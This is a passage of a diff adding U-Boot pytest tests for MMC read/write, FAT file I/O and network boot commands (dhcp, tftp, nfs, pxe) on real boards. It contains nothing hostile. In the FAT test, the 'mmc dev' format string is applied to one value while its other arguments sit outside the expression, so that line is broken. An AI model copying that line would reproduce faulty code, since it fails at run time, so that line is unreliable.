bytes written' % size + assert expected_text in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_fat_read_write_files(ubman): + test_mmc_list(ubman) + test_mmc_dev(ubman) + test_mmcinfo(ubman) + test_mmc_part(ubman) + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + + # Number of files to be written/read in MMC card + num_files = 100 + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + part_detect = 1 + addr = utils.find_ram_base(ubman) + count_f = 0 + addr_l = [] + size_l = [] + file_l = [] + crc32_l = [] + offset_l = [] + addr_l.append(addr) + + while count_f < num_files: + size_l.append(random.randint(4, 1 * 1024 * 1024)) + + # CRC32 count + output = ubman.run_command( + 'crc32 %x %x' % (addr_l[count_f], size_l[count_f]) + ) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + crc32_l.append(m.group(1)) + + # Write operation + file_l.append( + '%s_%d_%d' % ('uboot_test', count_f, size_l[count_f]) + ) + output = ubman.run_command( + '%swrite mmc %d:%s %x %s %x' + % ( + fs, + x, + part, + addr_l[count_f], + file_l[count_f], + size_l[count_f], + ) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size_l[count_f] + assert expected_text in output + + addr_l.append(addr_l[count_f] + size_l[count_f] + 1048576) + count_f += 1 + + count_f = 0 + while count_f < num_files: + alignment = int( + ubman.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset_l.append(random.randrange(alignment, 1024, alignment)) + + # Read operation + output = ubman.run_command( + '%sload mmc %d:%s %x %s' + % ( + fs, + x, + part, + addr_l[count_f] + offset_l[count_f], + file_l[count_f], + ) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size_l[count_f] + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr_l[count_f] + offset_l[count_f]) + ) + assert crc32_l[count_f] in output + + count_f += 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) diff --git a/test/py/tests/test_mmc_rd.py b/test/py/tests/test_mmc_rd.py new file mode 100644 index 00000000000..cd1e299aa9d --- /dev/null +++ b/test/py/tests/test_mmc_rd.py @@ -0,0 +1,286 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "mmc read" command. The test reads data from the eMMC or SD +# card, and validates the no errors occurred, and that the expected data was +# read if the test configuration contains a CRC of the expected data. + +import pytest +import time +import utils + +""" +This test relies on boardenv_* to containing configuration values to define +which MMC devices should be tested. For example: + +# Configuration data for test_mmc_dev, test_mmc_rescan, test_mmc_info; defines +# whole MMC devices that mmc dev/rescan/info commands may operate upon. +env__mmc_dev_configs = ( + { + 'fixture_id': 'emmc-boot0', + 'is_emmc': True, + 'devid': 0, + 'partid': 1, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'emmc-boot1', + 'is_emmc': True, + 'devid': 0, + 'partid': 2, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'emmc-data', + 'is_emmc': True, + 'devid': 0, + 'partid': 0, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'sd', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, +) + +# Configuration data for test_mmc_rd; defines regions of the MMC (entire +# devices, or ranges of sectors) which can be read: +env__mmc_rd_configs = ( + { + 'fixture_id': 'emmc-boot0', + 'is_emmc': True, + 'devid': 0, + 'partid': 1, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-boot1', + 'is_emmc': True, + 'devid': 0, + 'partid': 2, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-data', + 'is_emmc': True, + 'devid': 0, + 'partid': 0, + 'sector': 0x10, + 'count': 0x1000, + }, + { + 'fixture_id': 'sd-mbr', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0, + 'count': 1, + 'crc32': '8f6ecf0d', + }, + { + 'fixture_id': 'sd-large', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0x10, + 'count': 0x1000, + }, +) +""" + +def mmc_dev(ubman, is_emmc, devid, partid): + """Run the "mmc dev" command. + + Args: + ubman: A U-Boot console connection. + is_emmc: Whether the device is eMMC + devid: Device ID + partid: Partition ID + + Returns: + Nothing. + """ + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = ubman.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = '(part %d)' % partid + else: + partid_response = '' + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(ubman, env__mmc_dev_config): + """Test the "mmc dev" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(ubman, env__mmc_dev_config): + """Test the "mmc rescan" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + + # Rescan MMC device + cmd = 'mmc rescan' + response = ubman.run_command(cmd) + assert 'no card present' not in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(ubman, env__mmc_dev_config): + """Test the "mmc info" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + info_device = env__mmc_dev_config['info_device'] + info_speed = env__mmc_dev_config['info_speed'] + info_mode = env__mmc_dev_config['info_mode'] + info_buswidth = env__mmc_dev_config['info_buswidth'] + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + + # Read MMC device information + cmd = 'mmc info' + response = ubman.run_command(cmd) + good_response = "Device: %s" % info_device + assert good_response in response + good_response = "Bus Speed: %s" % info_speed + assert good_response in response + good_response = "Mode: %s" % info_mode + assert good_response in response + good_response = "Bus Width: %s" % info_buswidth + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rd(ubman, env__mmc_rd_config): + """Test the "mmc read" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_rd_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_rd_config['is_emmc'] + devid = env__mmc_rd_config['devid'] + partid = env__mmc_rd_config.get('partid', 0) + sector = env__mmc_rd_config.get('sector', 0) + count_sectors = env__mmc_rd_config.get('count', 1) + expected_crc32 = env__mmc_rd_config.get('crc32', None) + read_duration_max = env__mmc_rd_config.get('read_duration_max', 0) + + count_bytes = count_sectors * 512 + bcfg = ubman.config.buildconfig + has_cmd_memory = bcfg.get('config_cmd_memory', 'n') == 'y' + has_cmd_crc32 = bcfg.get('config_cmd_crc32', 'n') == 'y' + ram_base = utils.find_ram_base(ubman) + addr = '0x%08x' % ram_base + + # Select MMC device + mmc_dev(ubman, is_emmc, devid, partid) + + # Clear target RAM + if expected_crc32: + if has_cmd_memory and has_cmd_crc32: + cmd = 'mw.b %s 0 0x%x' % (addr, count_bytes) + ubman.run_command(cmd) + + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = ubman.run_command(cmd) + assert expected_crc32 not in response + else: + ubman.log.warning( + 'CONFIG_CMD_MEMORY or CONFIG_CMD_CRC32 != y: Skipping RAM clear') + + # Read data + cmd = 'mmc read %s %x %x' % (addr, sector, count_sectors) + tstart = time.time() + response = ubman.run_command(cmd) + tend = time.time() + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % ( + devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Check target RAM + if expected_crc32: + if has_cmd_crc32: + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = ubman.run_command(cmd) + assert expected_crc32 in response + else: + ubman.log.warning('CONFIG_CMD_CRC32 != y: Skipping check') + + # Check if the command did not take too long + if read_duration_max: + elapsed = tend - tstart + ubman.log.info('Reading %d bytes took %f seconds' % + (count_bytes, elapsed)) + assert elapsed <= (read_duration_max - 0.01) diff --git a/test/py/tests/test_mmc_wr.py b/test/py/tests/test_mmc_wr.py new file mode 100644 index 00000000000..41a75f885e1 --- /dev/null +++ b/test/py/tests/test_mmc_wr.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> + +# Test U-Boot's "mmc write" command. The test generates random data, writes it +# to the eMMC or SD card, then reads it back and performs a comparison. + +import pytest +import utils + +""" +This test relies on boardenv_* to containing configuration values to define +which MMC devices should be tested. For example: + +env__mmc_wr_configs = ( + { + "fixture_id": "emmc-boot0", + "is_emmc": True, + "devid": 1, + "partid": 1, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, + { + "fixture_id": "emmc-boot1", + "is_emmc": True, + "devid": 1, + "partid": 2, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, +) + +""" + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_random') +def test_mmc_wr(ubman, env__mmc_wr_config): + """Test the "mmc write" command. + + Args: + ubman: A U-Boot console connection. + env__mmc_wr_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_wr_config['is_emmc'] + devid = env__mmc_wr_config['devid'] + partid = env__mmc_wr_config.get('partid', 0) + sector = env__mmc_wr_config.get('sector', 0) + count_sectors = env__mmc_wr_config.get('count', 1) + test_iterations = env__mmc_wr_config.get('test_iterations', 1) + + + count_bytes = count_sectors * 512 + bcfg = ubman.config.buildconfig + ram_base = utils.find_ram_base(ubman) + src_addr = '0x%08x' % ram_base + dst_addr = '0x%08x' % (ram_base + count_bytes) + + + for i in range(test_iterations): + # Generate random data + cmd = 'random %s %x' % (src_addr, count_bytes) + response = ubman.run_command(cmd) + good_response = '%d bytes filled with random data' % (count_bytes) + assert good_response in response + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = ubman.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = "(part %d)" % partid + else: + partid_response = "" + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + + # Write data + cmd = 'mmc write %s %x %x' % (src_addr, sector, count_sectors) + response = ubman.run_command(cmd) + good_response = 'MMC write: dev # %d, block # %d, count %d ... %d blocks written: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Read data + cmd = 'mmc read %s %x %x' % (dst_addr, sector, count_sectors) + response = ubman.run_command(cmd) + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Compare src and dst data + cmd = 'cmp.b %s %s %x' % (src_addr, dst_addr, count_bytes) + response = ubman.run_command(cmd) + good_response = 'Total of %d byte(s) were the same' % (count_bytes) + assert good_response in response diff --git a/test/py/tests/test_net.py b/test/py/tests/test_net.py new file mode 100644 index 00000000000..4732e4b57f8 --- /dev/null +++ b/test/py/tests/test_net.py @@ -0,0 +1,460 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test various network-related functionality, such as the dhcp, ping, and +# tftpboot commands. + +import pytest +import utils +import uuid +import datetime +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, this test +will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# False or omitted if a DHCP server is attached to the network, and dhcp abort +# case should be tested. +# If DHCP abort testing is not possible or desired, set this variable to True. +# For example: On some setup, dhcp is too fast and this case may not work. +env__dhcp_abort_test_skip = True + +# True if a DHCPv6 server is attached to the network, and should be tested. +# If DHCPv6 testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp6_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__net_tftp_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', + 'timeout': 50000, + 'fnu': 'ubtest-upload.bin', +} + +# Details regarding a file that may be read from a NFS server. This variable +# may be omitted or set to None if NFS testing is not possible or desired. +env__net_nfs_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', +} + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if PXE testing is not possible or desired. +env__net_pxe_readable_file = { + 'fn': 'default', + 'addr': 0x2000000, + 'size': 74, + 'timeout': 50000, + 'pattern': 'Linux', +} + +# True if a router advertisement service is connected to the network, and should +# be tested. If router advertisement testing is not possible or desired, this +variable may be omitted or set to False. +env__router_on_net = True +""" + +net_set_up = False +net6_set_up = False + + +@pytest.mark.buildconfigspec('cmd_net') +def test_net_pre_commands(ubman): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. + """ + + init_usb = ubman.config.env.get('env__net_uses_usb', False) + if init_usb: + ubman.run_command('usb start') + + init_pci = ubman.config.env.get('env__net_uses_pci', False) + if init_pci: + ubman.run_command('pci enum') + + ubman.run_command('net list') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_net_dhcp(ubman): + """Test the dhcp command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('cmd_mii') +def test_net_dhcp_abort(ubman): + """Test the dhcp command by pressing ctrl+c in the middle of dhcp request + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + if ubman.config.env.get('env__dhcp_abort_test_skip', True): + pytest.skip('DHCP abort test is not enabled!') + + ubman.run_command('setenv autoload no') + + # Phy reset before running dhcp command + output = ubman.run_command('mii device') + if not re.search(r"Current device: '(.+?)'", output): + pytest.skip('PHY device does not exist!') + eth_num = re.search(r"Current device: '(.+?)'", output).groups()[0] + ubman.run_command(f'mii device {eth_num}') + output = ubman.run_command('mii info') + eth_addr = hex(int(re.search(r'PHY (.+?):', output).groups()[0], 16)) + ubman.run_command(f'mii modify {eth_addr} 0 0x8000 0x8000') + + ubman.run_command('dhcp', wait_for_prompt=False) + try: + ubman.wait_for('Waiting for PHY auto negotiation to complete') + except: + pytest.skip('Timeout waiting for PHY auto negotiation to complete') + + ubman.wait_for('done') + + try: + # Sending Ctrl-C + output = ubman.run_command( + chr(3), wait_for_echo=False, send_nl=False + ) + assert 'TIMEOUT' not in output + assert 'DHCP client bound to address ' not in output + assert 'Abort' in output + finally: + # Provide a time to recover from Abort - if it is not performed + # There is message like: ethernet@ff0e0000: No link. + ubman.run_command('sleep 1') + # Run the dhcp test to setup the network configuration + test_net_dhcp(ubman) + +@pytest.mark.buildconfigspec('cmd_dhcp6') +def test_net_dhcp6(ubman): + """Test the dhcp6 command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp6 = ubman.config.env.get('env__net_dhcp6_server', False) + if not test_dhcp6: + pytest.skip('No DHCP6 server available') + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp6') + assert 'DHCP6 client bound to ' in output + + global net6_set_up + net6_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_net_setup_static(ubman): + """Set up a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No static network configuration is defined') + + for (var, val) in env_vars: + ubman.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_ping') +def test_net_ping(ubman): + """Test the ping command. + + The $serverip (as set up by either test_net_dhcp or test_net_setup_static) + is pinged. The test validates that the host is alive, as reported by the + ping command's output. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + output = ubman.run_command('ping $serverip') + assert 'is alive' in output + +@pytest.mark.buildconfigspec('IPV6_ROUTER_DISCOVERY') +def test_net_network_discovery(ubman): + """Test the network discovery feature of IPv6. + + An IPv6 network command (ping6 in this case) is run to make U-Boot send a + router solicitation packet, receive a router advertisement message, and + parse it. + A router advertisement service needs to be running for this test to succeed. + U-Boot receives the RA, processes it, and if successful, assigns the gateway + IP and prefix length. + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + router_on_net = ubman.config.env.get('env__router_on_net', False) + if not router_on_net: + pytest.skip('No router on network') + + fake_host_ip = 'fe80::215:5dff:fef6:2ec6' + output = ubman.run_command('ping6 ' + fake_host_ip) + assert 'ROUTER SOLICITATION 1' in output + assert 'Set gatewayip6:' in output + assert '0000:0000:0000:0000:0000:0000:0000:0000' not in output + +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_net_tftpboot(ubman): + """Test the tftpboot command. + + A file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = ubman.config.env.get('env__net_tftp_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + + fn = f['fn'] + if not addr: + output = ubman.run_command('tftpboot %s' % (fn)) + else: + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = ubman.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + +@pytest.mark.buildconfigspec('cmd_nfs') +def test_net_nfs(ubman): + """Test the nfs command. + + A file is downloaded from the NFS server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = ubman.config.env.get('env__net_nfs_readable_file', None) + if not f: + pytest.skip('No NFS readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + fn = f['fn'] + output = ubman.run_command('nfs %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = ubman.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + +@pytest.mark.buildconfigspec("cmd_pxe") +def test_net_pxe_get(ubman): + """Test the pxe get command. + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip("Network not initialized") + + test_net_setup_static(ubman) + + f = ubman.config.env.get("env__net_pxe_readable_file", None) + if not f: + pytest.skip("No PXE readable file to read") + + addr = f.get("addr", None) + timeout = f.get("timeout", ubman.p.timeout) + + pxeuuid = uuid.uuid1() + ubman.run_command(f"setenv pxeuuid {pxeuuid}") + expected_text_uuid = f"Retrieving file: pxelinux.cfg/{pxeuuid}" + + ethaddr = ubman.run_command("echo $ethaddr") + ethaddr = ethaddr.replace(':', '-') + expected_text_ethaddr = f"Retrieving file: pxelinux.cfg/01-{ethaddr}" + + ip = ubman.run_command("echo $ipaddr") + ip = ip.split('.') + ipaddr_file = "".join(['%02x' % int(x) for x in ip]).upper() + expected_text_ipaddr = f"Retrieving file: pxelinux.cfg/{ipaddr_file}" + expected_text_default = f"Retrieving file: pxelinux.cfg/default" + + with ubman.temporary_timeout(timeout): + output = ubman.run_command("pxe get") + + assert "TIMEOUT" not in output + assert expected_text_uuid in output + assert expected_text_ethaddr in output + assert expected_text_ipaddr in output + + i = 1 + for i in range(0, len(ipaddr_file) - 1): + expected_text_ip = f"Retrieving file: pxelinux.cfg/{ipaddr_file[:-i]}" + assert expected_text_ip in output + i += 1 + + assert expected_text_default in output + assert "Config file 'default.boot' found" in output + +@pytest.mark.buildconfigspec("cmd_crc32") +@pytest.mark.buildconfigspec("cmd_tftpboot") +@pytest.mark.buildconfigspec("cmd_tftpput") +def test_net_tftpput(ubman): + """Test the tftpput command. + + A file is downloaded from the TFTP server and then uploaded to the TFTP + server, its size and its CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip("Network not initialized") + + f = ubman.config.env.get("env__net_tftp_readable_file", None) + if not f: + pytest.skip("No TFTP readable file to read") + + addr = f.get("addr", None) + if not addr: + addr = utils.find_ram_base(ubman) + + sz = f.get("size", None) + timeout = f.get("timeout", ubman.p.timeout) + fn = f["fn"] + fnu = f.get("fnu", "_".join([datetime.datetime.now().strftime("%y%m%d%H%M%S"), fn])) + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + + with ubman.temporary_timeout(timeout): + output = ubman.run_command("tftpboot %x %s" % (addr, fn)) + + assert "TIMEOUT" not in output + assert expected_text in output + + expected_tftpb_crc = f.get("crc32", None) + + output = ubman.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output + + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + "tftpput $fileaddr $filesize $serverip:%s" % (fnu) + ) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + addr = addr + sz + assert "TIMEOUT" not in output + assert "Access violation" not in output + assert expected_text in output + + with ubman.temporary_timeout(timeout): + output = ubman.run_command("tftpboot %x %s" % (addr, fnu)) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + assert "TIMEOUT" not in output + assert expected_text in output + + output = ubman.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output diff --git a/test/py/tests/test_net_boot.py b/test/py/tests/test_net_boot.py new file mode 100644 index 00000000000..abf6dfbaf5e --- /dev/null +++ b/test/py/tests/test_net_boot.py @@ -0,0 +1,400 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import utils +import test_net +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +which the network environment available for testing. Without this, this test +will be automatically skipped. + +For example: + +# Details regarding a boot image file that may be read from a TFTP server. This +# variable may be omitted or set to None if TFTP boot testing is not possible +# or desired. +env__net_tftp_bootable_file = { + 'fn': 'image.ub', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', + 'pattern': 'Linux', + 'config': 'config@2', + 'timeout': 50000, + 'check_type': 'boot_error', + 'check_pattern': 'ERROR', +} + +# False or omitted if a TFTP boot test should be tested. +# If TFTP boot testing is not possible or desired, set this variable to True. +# For example: If FIT image is not proper to boot +env__tftp_boot_test_skip = False + +# Here is the example of FIT image configurations: +configurations { + default = "config@1"; + config@1 { + description = "Boot Linux kernel with config@1"; + kernel = "kernel@0"; + fdt = "fdt@0"; + ramdisk = "ramdisk@0"; + hash@1 { + algo = "sha1"; + }; + }; + config@2 { + description = "Boot Linux kernel with config@2"; + kernel = "kernel@1"; + fdt = "fdt@1"; + ramdisk = "ramdisk@1"; + hash@1 { + algo = "sha1"; + }; + }; +}; + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if PXE testing is not possible or desired. +env__net_pxe_bootable_file = { + 'fn': 'default', + 'addr': 0x10000000, + 'size': 74, + 'timeout': 50000, + 'pattern': 'Linux', + 'valid_label': '1', + 'invalid_label': '2', + 'exp_str_invalid': 'Skipping install for failure retrieving', + 'local_label': '3', + 'exp_str_local': 'missing environment variable: localcmd', + 'empty_label': '4', + 'exp_str_empty': 'No kernel given, skipping boot', + 'check_type': 'boot_error', + 'check_pattern': 'ERROR', +} + +# False if a PXE boot test should be tested. +# If PXE boot testing is not possible or desired, set this variable to True. +# For example: If pxe configuration file is not proper to boot +env__pxe_boot_test_skip = False + +# Here is the example of pxe configuration file ordered based on the execution +# flow: +1) /tftpboot/pxelinux.cfg/default-arm-zynqmp + + menu include pxelinux.cfg/default-arm + timeout 50 + + default Linux + +2) /tftpboot/pxelinux.cfg/default-arm + + menu title Linux boot selections + menu include pxelinux.cfg/default + + label install + menu label Invalid boot + kernel kernels/install.bin + append console=ttyAMA0,38400 debug earlyprintk + initrd initrds/uzInitrdDebInstall + + label local + menu label Local boot + append root=/dev/sdb1 + localboot 1 + + label boot + menu label Empty boot + +3) /tftpboot/pxelinux.cfg/default + + label Linux + menu label Boot kernel + kernel Image + fdt system.dtb + initrd rootfs.cpio.gz.u-boot +""" + +def setup_networking(ubman): + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + +def setup_tftpboot_boot(ubman): + f = ubman.config.env.get('env__net_tftp_bootable_file', None) + if not f: + pytest.skip('No TFTP bootable file to read') + + setup_networking(ubman) + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + fn = f['fn'] + timeout = f.get('timeout', 50000) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + output = ubman.run_command('crc32 %x $filesize' % addr) + if expected_crc: + assert expected_crc in output + + pattern = f.get('pattern') + chk_type = f.get('check_type', 'boot_error') + chk_pattern = re.compile(f.get('check_pattern', 'ERROR')) + config = f.get('config', None) + + return addr, timeout, pattern, chk_type, chk_pattern, config + +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_net_tftpboot_boot(ubman): + """Boot the loaded image + + A boot file (fit image) is downloaded from the TFTP server and booted using + bootm command with the default fit configuration, its boot log pattern are + validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + if ubman.config.env.get('env__tftp_boot_test_skip', True): + pytest.skip('TFTP boot test is not enabled!') + + addr, timeout, pattern, chk_type, chk_pattern, imcfg = setup_tftpboot_boot( + ubman + ) + + if imcfg: + bootcmd = 'bootm %x#%s' % (addr, imcfg) + else: + bootcmd = 'bootm %x' % addr + + with ubman.enable_check( + chk_type, chk_pattern + ), ubman.temporary_timeout(timeout): + try: + # wait_for_prompt=False makes the core code not wait for the U-Boot + # prompt code to be seen, since it won't be on a successful kernel + # boot + ubman.run_command(bootcmd, wait_for_prompt=False) + + # Wait for boot log pattern + ubman.wait_for(pattern) + finally: + # This forces the console object to be shutdown, so any subsequent + # test will reset the board back into U-Boot. We want to force this + # no matter whether the kernel boot passed or failed. + ubman.drain_console() + ubman.cleanup_spawn() + +def setup_pxe_boot(ubman): + f = ubman.config.env.get('env__net_pxe_bootable_file', None) + if not f: + pytest.skip('No PXE bootable file to read') + + setup_networking(ubman) + bootfile = ubman.run_command('echo $bootfile') + if not bootfile: + bootfile = '<NULL>' + + return f, bootfile + +@pytest.mark.buildconfigspec('cmd_pxe') +def test_net_pxe_boot(ubman): + """Test the pxe boot command. + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning 